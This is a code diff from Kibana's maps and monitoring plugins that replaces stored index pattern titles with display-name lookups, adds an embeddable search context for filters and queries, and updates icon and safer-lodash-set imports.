+109,6 @@ export class ESGeoLineSource extends AbstractESAggSource { } async getImmutableProperties(): Promise { - let indexPatternTitle = this.getIndexPatternId(); - try { - const indexPattern = await this.getIndexPattern(); - indexPatternTitle = indexPattern.title; - } catch (error) { - // ignore error, title will just default to id - } - return [ { label: getDataSourceLabel(), @@ -124,7 +116,7 @@ export class ESGeoLineSource extends AbstractESAggSource { }, { label: getDataViewLabel(), - value: indexPatternTitle, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.esGeoLine.geospatialFieldLabel', { diff --git a/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx index 910181d6a2868..8e9f0aabf3070 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx @@ -96,14 +96,6 @@ export class ESPewPewSource extends AbstractESAggSource { } async getImmutableProperties() { - let indexPatternTitle = this.getIndexPatternId(); - try { - const indexPattern = await this.getIndexPattern(); - indexPatternTitle = indexPattern.title; - } catch (error) { - // ignore error, title will just default to id - } - return [ { label: getDataSourceLabel(), @@ -111,7 +103,7 @@ export class ESPewPewSource extends AbstractESAggSource { }, { label: getDataViewLabel(), - value: indexPatternTitle, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.pewPew.sourceGeoFieldLabel', { diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap b/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap index 1edbdec242722..c99d67ffd5a30 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap @@ -94,12 +94,10 @@ exports[`should enable sort order select when sort field provided 1`] = ` clusteringDisabledReason={null} filterByMapBounds={true} indexPatternId="indexPattern1" - mvtDisabledReason={null} numberOfJoins={0} onChange={[Function]} scalingType="LIMIT" supportsClustering={false} - supportsMvt={true} /> { ? { indexPatternId: indexPattern.id, geoField: geoFieldName, - scalingType: field && field.isRuntimeField ? SCALING_TYPES.LIMIT : SCALING_TYPES.MVT, + scalingType: SCALING_TYPES.MVT, } : null; const isPointsOnly = field ? field.type === 'geo_point' : false; diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx index b99903423376e..f55f5be747dcd 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx @@ -220,15 +220,12 @@ export class ESSearchSource extends AbstractESSource implements IMvtVectorSource } async getImmutableProperties(): Promise { - let indexPatternName = this.getIndexPatternId(); let geoFieldType = ''; try { - const indexPattern = await this.getIndexPattern(); - indexPatternName = indexPattern.title; const geoField = await this._getGeoField(); geoFieldType = geoField.type; } catch (error) { - // ignore error, title will just default to id + // ignore error, geoFieldType will just be blank } return [ @@ -238,7 +235,7 @@ export class ESSearchSource extends AbstractESSource implements IMvtVectorSource }, { label: getDataViewLabel(), - value: indexPatternName, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.esSearch.geoFieldLabel', { diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx b/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx index 2c8dca0f1cdf6..51ebe8cc9e042 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx @@ -47,8 +47,6 @@ interface State { sortFields: DataViewField[] | undefined; supportsClustering: boolean; clusteringDisabledReason: string | null; - supportsMvt: boolean; - mvtDisabledReason: string | null; } export class UpdateSourceEditor extends Component { @@ -58,8 +56,6 @@ export class UpdateSourceEditor extends Component { sortFields: undefined, supportsClustering: false, clusteringDisabledReason: null, - supportsMvt: true, - mvtDisabledReason: null, }; componentDidMount() { @@ -111,13 +107,6 @@ export class UpdateSourceEditor extends Component { this.setState({ supportsClustering: supportsGeoTileAgg(geoField), clusteringDisabledReason: getGeoTileAggNotSupportedReason(geoField), - supportsMvt: !geoField.isRuntimeField, - mvtDisabledReason: geoField.isRuntimeField - ? i18n.translate('xpack.maps.source.esSearch.mvtDisableReason', { - defaultMessage: 'Vector tile API does not support runtime {type} field', - values: { type: geoField.type }, - }) - : null, sourceFields, sortFields: indexPattern.fields.filter( (field) => field.sortable && !indexPatterns.isNestedField(field) @@ -228,8 +217,6 @@ export class UpdateSourceEditor extends Component { scalingType={this.props.scalingType} supportsClustering={this.state.supportsClustering} clusteringDisabledReason={this.state.clusteringDisabledReason} - supportsMvt={this.state.supportsMvt} - mvtDisabledReason={this.state.mvtDisabledReason} numberOfJoins={this.props.numberOfJoins} /> diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap index 0c77be62179c2..f8c5951e95e04 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap @@ -34,7 +34,6 @@ exports[`scaling form should disable clusters option when clustering is not supp
{}, scalingType: SCALING_TYPES.LIMIT, supportsClustering: true, - supportsMvt: true, termFields: [], numberOfJoins: 0, }; diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx index fd0c23a98df45..ccd3b3913a085 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx @@ -35,8 +35,6 @@ interface Props { scalingType: SCALING_TYPES; supportsClustering: boolean; clusteringDisabledReason?: string | null; - supportsMvt: boolean; - mvtDisabledReason?: string | null; numberOfJoins: number; } @@ -188,26 +186,6 @@ export class ScalingForm extends Component { ); } - _renderMvtRadio() { - const radio = ( - this._onScalingTypeSelect(SCALING_TYPES.MVT)} - disabled={!this.props.supportsMvt} - /> - ); - - return this.props.mvtDisabledReason ? ( - - {radio} - - ) : ( - radio - ); - } - _renderClusteringRadio() { const clusteringRadio = ( {
- {this._renderMvtRadio()} + this._onScalingTypeSelect(SCALING_TYPES.MVT)} + /> {this._renderClusteringRadio()} { try { const indexPattern = await this.getIndexPattern(); - return indexPattern.title; + return indexPattern.getName(); } catch (error) { // Unable to load index pattern, just return id as display name return this.getIndexPatternId(); diff --git a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js index 362b2b341714f..c5bce9de0b033 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js +++ b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js @@ -9,7 +9,6 @@ import { ESTermSource, extractPropertiesMap } from './es_term_source'; jest.mock('../../layers/vector_layer', () => {}); -const indexPatternTitle = 'myIndex'; const termFieldName = 'myTermField'; const sumFieldName = 'myFieldGettingSummed'; const metricExamples = [ @@ -33,19 +32,17 @@ describe('getMetricFields', () => { it('should override name and label of count metric', async () => { const source = new ESTermSource({ id: '1234', - indexPatternTitle: indexPatternTitle, term: termFieldName, indexPatternId: 'foobar', }); const metrics = source.getMetricFields(); expect(metrics[0].getName()).toEqual('__kbnjoin__count__1234'); - expect(await metrics[0].getLabel()).toEqual('Count of myIndex'); + expect(await metrics[0].getLabel()).toEqual('Count of foobar'); }); it('should override name and label of sum metric', async () => { const source = new ESTermSource({ id: '1234', - indexPatternTitle: indexPatternTitle, term: termFieldName, metrics: metricExamples, indexPatternId: 'foobar', @@ -54,7 +51,7 @@ describe('getMetricFields', () => { expect(metrics[0].getName()).toEqual('__kbnjoin__sum_of_myFieldGettingSummed__1234'); expect(await metrics[0].getLabel()).toEqual('my custom label'); expect(metrics[1].getName()).toEqual('__kbnjoin__count__1234'); - expect(await metrics[1].getLabel()).toEqual('Count of myIndex'); + expect(await metrics[1].getLabel()).toEqual('Count of foobar'); }); }); @@ -114,7 +111,6 @@ describe('getSyncMeta', () => { it('should contain meta requiring source re-fetch when changed', () => { const source = new ESTermSource({ id: '1234', - indexPatternTitle: indexPatternTitle, term: termFieldName, indexPatternId: 'foobar', size: 10, diff --git a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts index 5447910dc524a..71ce42be22ab0 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts +++ b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts @@ -63,9 +63,6 @@ export class ESTermSource extends AbstractESAggSource implements ITermJoinSource } return { ...normalizedDescriptor, - indexPatternTitle: descriptor.indexPatternTitle - ? descriptor.indexPatternTitle - : descriptor.indexPatternId, term: descriptor.term!, type: SOURCE_TYPES.ES_TERM_SOURCE, }; @@ -109,11 +106,18 @@ export class ESTermSource extends AbstractESAggSource implements ITermJoinSource }); } - getAggLabel(aggType: AGG_TYPE, fieldLabel: string): string { + async getAggLabel(aggType: AGG_TYPE, fieldLabel: string): Promise { + let indexPatternLabel: string | undefined; + try { + const indexPattern = await this.getIndexPattern(); + indexPatternLabel = indexPattern.getName(); + } catch (error) { + indexPatternLabel = this._descriptor.indexPatternId; + } return aggType === AGG_TYPE.COUNT ? i18n.translate('xpack.maps.source.esJoin.countLabel', { - defaultMessage: `Count of {indexPatternTitle}`, - values: { indexPatternTitle: this._descriptor.indexPatternTitle }, + defaultMessage: `Count of {indexPatternLabel}`, + values: { indexPatternLabel }, }) : super.getAggLabel(aggType, fieldLabel); } @@ -145,14 +149,14 @@ export class ESTermSource extends AbstractESAggSource implements ITermJoinSource const rawEsData = await this._runEsQuery({ requestId: this.getId(), - requestName: `${this._descriptor.indexPatternTitle}.${this._termField.getName()}`, + requestName: `${indexPattern.getName()}.${this._termField.getName()}`, searchSource, registerCancelCallback, requestDescription: i18n.translate('xpack.maps.source.esJoin.joinDescription', { defaultMessage: `Elasticsearch terms aggregation request, left source: {leftSource}, right source: {rightSource}`, values: { leftSource: `${leftSourceName}:${leftFieldName}`, - rightSource: `${this._descriptor.indexPatternTitle}:${this._termField.getName()}`, + rightSource: `${indexPattern.getName()}:${this._termField.getName()}`, }, }), searchSessionId: searchFilters.searchSessionId, diff --git a/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx b/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx index 64082a85df6b7..0620386fda4c1 100644 --- a/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx @@ -53,6 +53,10 @@ export interface BoundsRequestMeta { applyGlobalTime: boolean; filters: Filter[]; query?: Query; + embeddableSearchContext?: { + query?: Query; + filters: Filter[]; + }; sourceQuery?: Query; timeFilters: TimeRange; timeslice?: Timeslice; diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap index de9d74f68f965..41903e8accafc 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap @@ -48,7 +48,6 @@ exports[`Should render join editor 1`] = ` "right": Object { "id": "673ff994-fc75-4c67-909b-69fcb0e1060e", "indexPatternId": "abcde", - "indexPatternTitle": "kibana_sample_data_logs", "metrics": Array [ Object { "label": "web logs count", diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx index cb007110f7d35..1bfe40b555261 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx @@ -37,7 +37,6 @@ const defaultProps = { leftField: 'iso2', right: { id: '673ff994-fc75-4c67-909b-69fcb0e1060e', - indexPatternTitle: 'kibana_sample_data_logs', term: 'geo.src', indexPatternId: 'abcde', metrics: [ diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx index bbfc9bbb0f302..1eb23dc207cd4 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx @@ -95,13 +95,7 @@ export class Join extends Component { }); }; - _onRightSourceChange = ({ - indexPatternId, - indexPatternTitle, - }: { - indexPatternId: string; - indexPatternTitle: string; - }) => { + _onRightSourceChange = (indexPatternId: string) => { this.setState({ rightFields: [], loadError: undefined, @@ -113,7 +107,6 @@ export class Join extends Component { right: { ...restOfRight, indexPatternId, - indexPatternTitle, type: SOURCE_TYPES.ES_TERM_SOURCE, } as ESTermSourceDescriptor, }); @@ -183,9 +176,7 @@ export class Join extends Component { const { join, onRemove, leftFields, leftSourceName } = this.props; const { rightFields, indexPattern } = this.state; const right = _.get(join, 'right', {}) as ESTermSourceDescriptor; - const rightSourceName = right.indexPatternTitle - ? right.indexPatternTitle - : right.indexPatternId; + const rightSourceName = indexPattern ? indexPattern.getName() : right.indexPatternId; const isJoinConfigComplete = join.leftField && right.indexPatternId && right.term; let metricsExpression; diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx index 553e30e3194f3..9e55833698c7d 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx @@ -26,10 +26,7 @@ import { SingleFieldSelect } from '../../../../components/single_field_select'; import { ValidatedNumberInput } from '../../../../components/validated_number_input'; import { getTermsFields } from '../../../../index_pattern_util'; -import { - getIndexPatternService, - getIndexPatternSelectComponent, -} from '../../../../kibana_services'; +import { getIndexPatternSelectComponent } from '../../../../kibana_services'; import type { JoinField } from '../join_editor'; interface Props { @@ -44,13 +41,7 @@ interface Props { // Right source props rightSourceIndexPatternId: string; rightSourceName: string; - onRightSourceChange: ({ - indexPatternId, - indexPatternTitle, - }: { - indexPatternId: string; - indexPatternTitle: string; - }) => void; + onRightSourceChange: (indexPatternId: string) => void; // Right field props rightValue: string; @@ -81,20 +72,12 @@ export class JoinExpression extends Component { }); }; - _onRightSourceChange = async (indexPatternId?: string) => { + _onRightSourceChange = (indexPatternId?: string) => { if (!indexPatternId || indexPatternId.length === 0) { return; } - try { - const indexPattern = await getIndexPatternService().get(indexPatternId); - this.props.onRightSourceChange({ - indexPatternId, - indexPatternTitle: indexPattern.title, - }); - } catch (err) { - // do not call onChange with when unable to get indexPatternId - } + this.props.onRightSourceChange(indexPatternId); }; _onLeftFieldChange = (selectedFields: Array>) => { diff --git a/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx b/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx index 4601b5c569290..443dd7b47a069 100644 --- a/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx +++ b/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx @@ -12,14 +12,6 @@ import { ToolsControl } from './tools_control'; const defaultProps = { initiateDraw: () => {}, cancelDraw: () => {}, - geoFields: [ - { - geoFieldName: 'location', - geoFieldType: 'geo_point', - indexPatternTitle: 'my_index', - indexPatternId: '1', - }, - ], filterModeActive: false, activateDrawFilterMode: () => {}, deactivateDrawMode: () => {}, diff --git a/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx b/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx index d271ee053d8c7..76f6dbbb15133 100644 --- a/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx +++ b/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx @@ -36,6 +36,7 @@ import { setReadOnly, updateLayerById, setGotoWithCenter, + setEmbeddableSearchContext, } from '../actions'; import { getIsLayerTOCOpen, getOpenTOCDetails } from '../selectors/ui_selectors'; import { @@ -48,6 +49,7 @@ import { import { areLayersLoaded, getGeoFieldNames, + getEmbeddableSearchContext, getLayerList, getGoto, getMapCenter, @@ -194,6 +196,21 @@ export class MapEmbeddable forceRefresh: false, }); + const mapStateJSON = this._savedMap.getAttributes().mapStateJSON; + if (mapStateJSON) { + try { + const mapState = JSON.parse(mapStateJSON); + store.dispatch( + setEmbeddableSearchContext({ + filters: mapState.filters ? mapState.filters : [], + query: mapState.query, + }) + ); + } catch (e) { + // ignore malformed mapStateJSON, not a critical error for viewing map - map will just use defaults + } + } + this._unsubscribeFromStore = store.subscribe(() => { this._handleStoreChanges(); }); @@ -249,20 +266,18 @@ export class MapEmbeddable return this._isInitialized ? this._savedMap.getAttributes().description : ''; } - /** - * TODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved - * @returns [] - */ public async getFilters() { - return []; + const embeddableSearchContext = getEmbeddableSearchContext( + this._savedMap.getStore().getState() + ); + return embeddableSearchContext ? embeddableSearchContext.filters : []; } - /** - * TODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved - * @returns undefined - */ public async getQuery() { - return undefined; + const embeddableSearchContext = getEmbeddableSearchContext( + this._savedMap.getStore().getState() + ); + return embeddableSearchContext?.query; } public supportedTriggers(): string[] { diff --git a/x-pack/plugins/maps/public/lazy_load_bundle/index.ts b/x-pack/plugins/maps/public/lazy_load_bundle/index.ts index cbd1b3aa4b4c8..cdf61a6ab9173 100644 --- a/x-pack/plugins/maps/public/lazy_load_bundle/index.ts +++ b/x-pack/plugins/maps/public/lazy_load_bundle/index.ts @@ -51,7 +51,6 @@ export interface LazyLoadedMapModules { termsSize, colorSchema, indexPatternId, - indexPatternTitle, metricAgg, metricFieldName, }: CreateRegionMapLayerDescriptorParams) => LayerDescriptor | null; diff --git a/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts b/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts index 7116718aa09bd..7c8f39da6a6fe 100644 --- a/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts +++ b/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts @@ -29,7 +29,6 @@ export function extractLayerDescriptorParams(vis: Vis) { leftFieldName: vis.params.selectedLayer.isEMS ? vis.params.selectedJoinField.name : undefined, colorSchema: vis.params.colorSchema, indexPatternId: vis.data.indexPattern?.id, - indexPatternTitle: vis.data.indexPattern?.title, metricAgg: 'count', }; diff --git a/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts b/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts index a7caa72c6c5df..68a17b4a0da67 100644 --- a/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts +++ b/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts @@ -9,8 +9,8 @@ import { partition } from 'lodash'; import { i18n } from '@kbn/i18n'; import type { FileLayer } from '@elastic/ems-client'; import type { SuggestionRequest, VisualizationSuggestion } from '@kbn/lens-plugin/public'; +import { IconRegionMap } from '@kbn/chart-icons'; import type { ChoroplethChartState } from './types'; -import { Icon } from './icon'; import { getEmsSuggestion } from './get_ems_suggestion'; /** @@ -72,7 +72,7 @@ export function getSuggestions( valueAccessor: metric.columnId, regionAccessor: bucket.columnId, }, - previewIcon: Icon, + previewIcon: IconRegionMap, }); } } diff --git a/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx b/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx index 54f459c3f7b38..b6e22ce3cb635 100644 --- a/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx +++ b/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx @@ -15,9 +15,9 @@ import { ThemeServiceStart } from '@kbn/core/public'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; import { layerTypes } from '@kbn/lens-plugin/public'; import type { OperationMetadata, SuggestionRequest, Visualization } from '@kbn/lens-plugin/public'; +import { IconRegionMap } from '@kbn/chart-icons'; import { getSuggestions } from './suggestions'; import type { ChoroplethChartState } from './types'; -import { Icon } from './icon'; import { RegionKeyEditor } from './region_key_editor'; const REGION_KEY_GROUP_ID = 'region_key'; @@ -41,7 +41,7 @@ export const getVisualization = ({ visualizationTypes: [ { id: 'lnsChoropleth', - icon: Icon, + icon: IconRegionMap, label: CHART_LABEL, groupLabel: i18n.translate('xpack.maps.lens.groupLabel', { defaultMessage: 'Map', @@ -70,7 +70,7 @@ export const getVisualization = ({ getDescription() { return { - icon: Icon, + icon: IconRegionMap, label: CHART_LABEL, }; }, diff --git a/x-pack/plugins/maps/public/locators.ts b/x-pack/plugins/maps/public/locators.ts index b08c68ec96d61..92749605efbb1 100644 --- a/x-pack/plugins/maps/public/locators.ts +++ b/x-pack/plugins/maps/public/locators.ts @@ -186,7 +186,6 @@ export interface MapsAppRegionMapLocatorParams extends SerializableRecord { termsSize?: number; colorSchema: string; indexPatternId?: string; - indexPatternTitle?: string; metricAgg: string; metricFieldName?: string; timeRange?: TimeRange; @@ -219,7 +218,6 @@ export class MapsAppRegionMapLocatorDefinition termsSize, colorSchema, indexPatternId, - indexPatternTitle, metricAgg, metricFieldName, filters, @@ -237,7 +235,6 @@ export class MapsAppRegionMapLocatorDefinition termsSize, colorSchema, indexPatternId, - indexPatternTitle, metricAgg, metricFieldName, }); diff --git a/x-pack/plugins/maps/public/reducers/map/map.ts b/x-pack/plugins/maps/public/reducers/map/map.ts index d0e77268fd58c..41de8ab0b8b0f 100644 --- a/x-pack/plugins/maps/public/reducers/map/map.ts +++ b/x-pack/plugins/maps/public/reducers/map/map.ts @@ -21,6 +21,7 @@ import { MAP_EXTENT_CHANGED, MAP_READY, MAP_DESTROYED, + SET_EMBEDDABLE_SEARCH_CONTEXT, SET_QUERY, UPDATE_LAYER, UPDATE_LAYER_PROP, @@ -313,6 +314,14 @@ export function map(state: MapState = DEFAULT_MAP_STATE, action: Record & { timeslice?: Timeslice; query?: Query; filters: Filter[]; + embeddableSearchContext?: { + query?: Query; + filters: Filter[]; + }; drawState?: DrawState; editState?: EditState; searchSessionId?: string; diff --git a/x-pack/plugins/maps/public/selectors/map_selectors.test.ts b/x-pack/plugins/maps/public/selectors/map_selectors.test.ts index baca2d79b833d..584bdd0160b8c 100644 --- a/x-pack/plugins/maps/public/selectors/map_selectors.test.ts +++ b/x-pack/plugins/maps/public/selectors/map_selectors.test.ts @@ -57,6 +57,7 @@ describe('getDataFilters', () => { const timeFilters = { to: '2001-01-01', from: '2001-12-31' }; const timeslice = undefined; const query = undefined; + const embeddableSearchContext = undefined; const filters: Filter[] = []; const searchSessionId = '12345'; const searchSessionMapBuffer = { @@ -76,6 +77,7 @@ describe('getDataFilters', () => { timeslice, query, filters, + embeddableSearchContext, searchSessionId, searchSessionMapBuffer, isReadOnly @@ -92,6 +94,7 @@ describe('getDataFilters', () => { timeslice, query, filters, + embeddableSearchContext, searchSessionId, undefined, isReadOnly diff --git a/x-pack/plugins/maps/public/selectors/map_selectors.ts b/x-pack/plugins/maps/public/selectors/map_selectors.ts index a069b07d1f2c6..8adb3f8f927ab 100644 --- a/x-pack/plugins/maps/public/selectors/map_selectors.ts +++ b/x-pack/plugins/maps/public/selectors/map_selectors.ts @@ -198,6 +198,9 @@ export const getQuery = ({ map }: MapStoreState): Query | undefined => map.mapSt export const getFilters = ({ map }: MapStoreState): Filter[] => map.mapState.filters; +export const getEmbeddableSearchContext = ({ map }: MapStoreState) => + map.mapState.embeddableSearchContext; + export const getSearchSessionId = ({ map }: MapStoreState): string | undefined => map.mapState.searchSessionId; @@ -239,6 +242,7 @@ export const getDataFilters = createSelector( getTimeslice, getQuery, getFilters, + getEmbeddableSearchContext, getSearchSessionId, getSearchSessionMapBuffer, getIsReadOnly, @@ -250,6 +254,7 @@ export const getDataFilters = createSelector( timeslice, query, filters, + embeddableSearchContext, searchSessionId, searchSessionMapBuffer, isReadOnly @@ -262,6 +267,7 @@ export const getDataFilters = createSelector( timeslice, query, filters, + embeddableSearchContext, searchSessionId, isReadOnly, }; diff --git a/x-pack/plugins/maps/tsconfig.json b/x-pack/plugins/maps/tsconfig.json index 57cc09dec4b16..ee28c2be8d31c 100644 --- a/x-pack/plugins/maps/tsconfig.json +++ b/x-pack/plugins/maps/tsconfig.json @@ -32,7 +32,6 @@ { "path": "../../../src/plugins/usage_collection/tsconfig.json" }, { "path": "../../../src/plugins/kibana_react/tsconfig.json" }, { "path": "../../../src/plugins/kibana_utils/tsconfig.json" }, - { "path": "../../../src/plugins/shared_ux/tsconfig.json" }, { "path": "../../../src/plugins/screenshot_mode/tsconfig.json" }, { "path": "../cloud/tsconfig.json" }, { "path": "../features/tsconfig.json" }, diff --git a/x-pack/plugins/monitoring/public/components/table/storage.ts b/x-pack/plugins/monitoring/public/components/table/storage.ts index 7d4d3129650ae..3c28be3fe6114 100644 --- a/x-pack/plugins/monitoring/public/components/table/storage.ts +++ b/x-pack/plugins/monitoring/public/components/table/storage.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get } from 'lodash'; import { Storage } from '@kbn/kibana-utils-plugin/public'; import { STORAGE_KEY } from '../../../common/constants'; diff --git a/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js b/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js index f74fd30fde84b..cb01c182694b4 100644 --- a/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js +++ b/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, each } from 'lodash'; function addOne(obj, key) { diff --git a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts index d8bf8487cee09..dd69669405098 100644 --- a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts +++ b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts @@ -7,7 +7,7 @@ import { notFound } from '@hapi/boom'; import { get, omit } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { i18n } from '@kbn/i18n'; import { getClustersStats } from './get_clusters_stats'; import { flagSupportedClusters } from './flag_supported_clusters'; diff --git a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js index 6b35012c9d55b..1b9e40e4d6300 100644 --- a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js +++ b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js @@ -7,7 +7,7 @@ import { handleResponse } from './get_clusters_state'; import moment from 'moment'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; const clusters = [ { diff --git a/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js b/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js index a04e53fdbbe9d..9ddcecb0cbbd0 100644 --- a/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js +++ b/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { handleResponse } from './get_ml_jobs'; describe('Get ML Jobs', () => { diff --git a/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js b/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js index d249bc82b9387..915c305d294c7 100644 --- a/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js +++ b/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { calculateNodeType } from './calculate_node_type'; const masterNodeId = 'def456'; diff --git a/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts b/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts index 236b9280c3b05..c24efe86e48ff 100644 --- a/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts +++ b/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; 